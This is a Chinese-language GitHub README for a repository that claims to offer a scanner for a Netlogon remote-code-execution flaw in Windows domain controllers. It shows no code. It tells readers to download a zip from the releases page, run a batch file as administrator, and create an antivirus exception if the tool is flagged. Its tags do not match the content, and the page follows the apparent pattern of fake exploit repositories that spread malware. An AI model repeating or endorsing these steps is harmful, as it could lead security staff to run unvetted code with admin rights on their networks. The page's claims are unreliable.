opensource-arrozconpollo191/CVE-2026-41089-Netlogon-RCE
GitHub: opensource-arrozconpollo191/CVE-2026-41089-Netlogon-RCE
一款用于检测 Windows 域控制器是否存在 CVE-2026-41089 Netlogon 远程代码执行漏洞的专用安全扫描工具。
Stars: 0 | Forks: 0
# 🛡️ CVE-2026-41089-Netlogon-RCE - 分析严重的 Windows 服务安全漏洞
[](https://github.com/opensource-arrozconpollo191/CVE-2026-41089-Netlogon-RCE/releases)
本仓库提供了用于分析和测试已知为 CVE-2026-41089 的 Netlogon 漏洞的工具。该工具可帮助安全专业人员识别其 Windows Domain Controller 是否面临此特定远程代码执行缺陷的风险。
## 📋 了解风险
Netlogon 服务负责管理 Windows 域环境中的用户身份验证和网络流量。该服务中的缺陷允许未经身份验证的用户向 Domain Controller 发送特定的网络数据包。此操作可能导致系统被完全接管。
安全团队使用此工具来验证其补丁状态。通过运行提供的概念验证,您可以确认您的系统是否有效阻止了这些未经授权的尝试。
## 🖥️ 系统要求
要使用此工具,请确保您的环境符合以下标准:
- 操作系统:Windows 10、Windows 11 或 Windows Server 2019/2022。
- 网络访问:与目标 Domain Controller 的直接连接。
- 权限:您需要本地管理员权限才能执行网络测试实用程序。
- 软件:必须启用 Windows PowerShell 环境。
## 📥 下载和设置
请按照以下步骤获取该工具:
1. 访问[官方发布页面](https://github.com/opensource-arrozconpollo191/CVE-2026-41089-Netlogon-RCE/releases)以下载最新版本。
2. 选择适用于您的 Windows 系统并以 .zip 结尾的文件。
3. 将文件夹保存到您可以访问的位置,例如您的“下载”文件夹。
4. 右键单击该文件夹并选择“全部解压缩”以查看内容。
## ⚙️ 运行安全工具
下载完成后,请按照以下步骤使用该工具:
1. 打开名为 CVE-2026-41089-Netlogon-RCE 的解压缩文件夹。
2. 找到名为 run_analysis.bat 的文件。
3. 右键单击此文件并选择“以管理员身份运行”。
4. 将出现一个控制台窗口。出现提示时,输入目标 Domain Controller 的 IP 地址。
5. 该工具将对 Netlogon 服务执行一系列非破坏性检查。
6. 查看控制台窗口中提供的输出。
## 🔍 解释结果
该工具显示两种主要结果:
- Vulnerable:目标系统接受测试数据包。这表明系统需要 Microsoft 的即时安全补丁。
- Secure:系统拒绝测试数据包。您当前的安全配置阻止了此攻击途径。
## 🛡️ 修复的最佳实践
如果您的测试表明系统存在漏洞,请立即采取以下步骤:
1. 检查 Windows 更新。Microsoft 发布的补丁专门用于弥补这些漏洞。
2. 确保 Netlogon 服务使用安全的 RPC 通信。
3. 使用防火墙规则限制对 Domain Controller 的访问。仅允许来自已知、受信任设备的流量。
4. 检查日志中是否有任何异常的身份验证活动。
## ⚙️ 高级配置(可选)
有特定网络需求的用户可以修改程序文件夹中的 config.json 文件。此文件允许您更改内部超时或日志文件位置。在进行更改之前,请务必保存原始文件的副本。
## ⚠️ 重要安全规则
仅对您拥有或获得明确测试许可的系统使用此工具。未经授权在网络上进行测试可能会导致服务中断或产生安全风险。请谨慎对待所有网络分析。此工具的存在仅出于教育目的和授权的安全审计。
## 🆘 故障排除
- 权限错误:确保您以管理员身份运行该文件。右键单击文件是选择此选项的最佳方式。
- 网络超时:验证您的机器是否可以 ping 通目标 Domain Controller。防火墙通常默认阻止测试流量。
- 文件缺失:如果控制台无法启动,请确保在运行脚本之前从 zip 文件夹中解压缩了所有文件。
- 杀毒软件标记:由于该工具的性质,某些安全软件可能会对其进行标记。您可能需要在杀毒软件设置中为该工具文件夹创建一个例外,以允许其运行。
## 📖 常见问题
此工具会在我的机器上安装软件吗?
不会。该应用程序作为便携式脚本运行。它不会修改您的 Windows 注册表或安装后台服务。
此工具会使我的 Domain Controller 崩溃吗?
该工具使用标准的、非破坏性的网络查询。它遵循安全的测试模式,以确保对系统性能的影响降至最低。
我需要特殊的账户来运行它吗?
您需要在用于启动该工具的计算机上拥有管理权限。您不需要 Domain Admin 账户来执行测试,因为该漏洞会影响未经身份验证的访问。
我应该多久运行一次?
在每次重大 Windows 补丁更新后运行此工具,以验证您的安全控制措施是否保持活动状态并有效。
关键字:active-directory, buffer-overflow, cve-2026-41089, cybersecurity, domain-controller, exploit-poc, netlogon-rce, privilege-escalation, remote-code-execution, threat-hunting, windows-security, zero-day
标签:Homebrew安装, IPv6, Maven, PowerShell, XXE攻击, 域控安全, 漏洞验证